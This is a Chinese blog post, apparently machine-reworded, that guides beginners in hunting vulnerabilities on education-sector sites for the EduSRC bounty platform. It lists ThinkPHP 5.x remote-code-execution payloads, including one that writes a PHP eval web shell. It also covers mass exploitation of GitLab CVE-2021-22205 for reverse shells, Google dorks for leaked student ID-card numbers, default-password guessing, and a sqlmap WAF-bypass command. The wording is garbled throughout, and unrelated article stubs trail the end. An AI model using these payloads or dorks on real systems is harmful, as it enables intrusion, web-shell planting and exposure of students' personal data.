首页 » SEO优化 » javascriptpackerphp技巧_小白快速入门SRC挖掘以edusrc为例

javascriptpackerphp技巧_小白快速入门SRC挖掘以edusrc为例

访客 2024-11-20 0

扫一扫用手机浏览

文章目录 [+]

现阶段,教诲行业漏洞报告平台吸收如下种别单位漏洞:

教诲部各省、自治区教诲厅、直辖市教委、各级教诲局学校教诲干系软件

可以看到不仅是大学的资产、还有小学初中高中的教诲局的也可以交到上面、而资产不仅只有网站,也可以从小程序,app方面入手,不过这方面利用难度就要大一些

javascriptpackerphp技巧_小白快速入门SRC挖掘以edusrc为例

一些思路0x01信息搜集

网络到别人网络不到的资产,就能挖到别人挖不到的洞。

javascriptpackerphp技巧_小白快速入门SRC挖掘以edusrc为例
(图片来自网络侵删)
网络空间测绘

奇安信的鹰图,fofa等

查询教诲资产的语法:domain="edu.cn" 表示搜索以edu.cn为结尾的资产,ip.isp="教诲",表示搜索教诲网段的资产,后者的搜索规模是比前者大很多

子域名搜集

phpinfo等在线的搜集

OneForAll gayhub有名的子域名网络工具

目前支持一键网络:子域、子域常用端口、子域Title、子域状态、子域做事器等

site:.edu.cn 谷歌语法也可以帮助我们找到一些域名信息

whois反查:

whois反查(知道该注册人拥有哪些域名)

电话反查

域名多的情形下,还可以域名批量反查

末了可以把以上工具搜集到的子域名去重就得到了一份完全的大学网站域名资产,这种做法对渗透一些证书大学很有帮助。

学号、身份证网络

这里就可以利用谷歌语法搜集

filetype:xls site:xxx.edu 身份证

有时候运气好就可以搜集到透露的身份证信息,+1rank(从来没碰着过)

如果能用这种方法搜集到对应的学号身份证,就可以进系统测试了!
或者直接连上vpn进内网上fscan扫描(这里的话可以通过上面说的搜集到的子域名去得到对应的内网ip地址,

指纹识别非常有用

谷歌插件wappalyzer:

image784×681 82.4 KB

c段旁站信息

这里我利用这个工具Cscan,虽然有些小bug但是也是非常推举的

image874×462 91.2 KB

还有一些在线网站:潮汐指纹

js api接口创造

这两个工具都可以去github下载

jsfind

Packer-Fuzzer(webpack 打包的前端都可以扫一下有惊喜

0x02我的一些骚思路

废话不多说了

先说一下我感想熏染的挖洞难度:证书大学站> 资产多的普通大学 > 资产多的职业学院 > 有账号密码能进内网

以是我一开始是去找那种职业学院打的,大概是排行榜50多页的学校,可以用鹰图title="xxxx"进行搜集,

image868×428 55.6 KB

由于一些带专网站的安全意识比较差的,以是有时候能碰着那种弱口令进后台文件上传拿shell的,关于弱口令:用户名一样平常是admin ,密码一样平常是123456,admin,888888 三选一,不是的话可以撤退了

弱口令真的yyds

除了弱口令

然后说一下其他思路

比如说think5未开逼迫路由RCE,这种网站很多大学都存在,但是探求thinkphp符和条件的网站却很难,一种利用鹰图便是搜索默认图标hash值来探求,但是这种估计很难捡到,但是在闲逛的过程中看到路由规则类似thinkphp的可以考试测验一下(靠这个上了十多rank

image872×445 57.1 KB

一些payload:

5.1.x :

?s=index/\think\Request/input&filter[]=system&data=pwd?s=index/\think\view\driver\Php/display&content=<?php phpinfo();?>?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

5.0.x :

?s=index/think\config/get&name=database.username # 获取配置信息?s=index/\think\Lang/load&file=../../test.jpg # 包含任意文件?s=index/\think\Config/load&file=../../t.php # 包含任意.php文件?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

写入 shell

public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../shell.php&vars[1][]=<?php @eval($_REQUEST[cmd]);?>

然后然后,讲一下我一些思路,利用一些Nday来快速上分,或者挖掘逻辑漏洞实现通杀

关于Nday这里举俩个例子大家自行体会

比如说你知道有一个cve 比方说这个gitlab的cve:gitlab-CVE-2021-22205,gitlab显而易见的是很多高校都有这个gitlab的托管网站

以是说我们只要把所有gitlab edu上的资产全部搜集过来然后利用脚本逐一检测就了

这里说一下怎么搜集的

先从图标下手,限定edu域名:可以看到有17条资产

image867×425 55 KB

限定ip有27条资产

image877×422 107 KB

去除图标的有45条资产

image881×432 119 KB

把数据全部导出网络到一起,利用github上的脚本进行检测,这样就捡到俩个洞,由于gitlab这个cve是可以反弹shell的,以是12rank得手

image886×421 90.7 KB

再说一个比如说springboot未授权访问漏洞:

同上一样的方法:直接搜java白页,把数据导出->脚本检测

image879×440 94.3 KB

由于范围足够大以是也能有不小收成

image872×515 73.6 KB

剩下的可以自己探索,或者有更好的思路可以互换

逻辑漏洞

这里可以利用jsfind脚本去探求一些js接口,可能会有未授权文件上传,ssrf等等,或者在登录抓取返回包把false改成true等操作,去实现登录绕过,总之来说便是要细心的阅读源码,找接口。

sql注入

探求注入点方法:site:edu.cn inurl:xxx.php|jsp|asp?xxx= xxx可以自己发挥想象 ,或者在一些老系统登录,支付平台上都有可能存在注入

但是sql注入大多学校都上了waf,绕过waf不随意马虎,紧张的方法有内联,分段,以及垃圾字符添补等等

这里举一个绕安全狗的例子:

这里原来的参数是a和b,但是a,b参数的输入会被waf检测,通过拦截可以看出是常见的安全狗waf,以是这里可以多添加俩个参数:aa,bb(后端不会吸收这两个参数,但是安全狗不会检测注释里的内容,这样就大略绕过了),指定好注入点利用sqlmap轻松拿下。

sqlmap -u "xxx.aspx?aa=/&a=1&b=2&bb=/" -p "b" --random-agent

标签:

相关文章

介绍6S充电,高效、安全、环保的充电之路

随着科技的飞速发展,智能手机已经成为人们生活中不可或缺的一部分。而苹果公司作为智能手机行业的领军企业,其产品凭借出色的性能和稳定的...

SEO优化 2025-01-01 阅读0 评论0

亿品赞,电商新贵崛起,品质生活引领者

随着互联网的飞速发展,电子商务已经成为人们生活中不可或缺的一部分。在众多电商平台中,亿品赞以其独特的经营理念、优质的产品和服务,赢...

SEO优化 2025-01-01 阅读0 评论0

人际交往的艺术,如何巧妙地添加好友

在这个信息爆炸的时代,社交网络的普及使得人际交往变得更加便捷。如何巧妙地添加好友,成为了许多人关心的问题。本文将从多个角度探讨如何...

SEO优化 2025-01-01 阅读0 评论0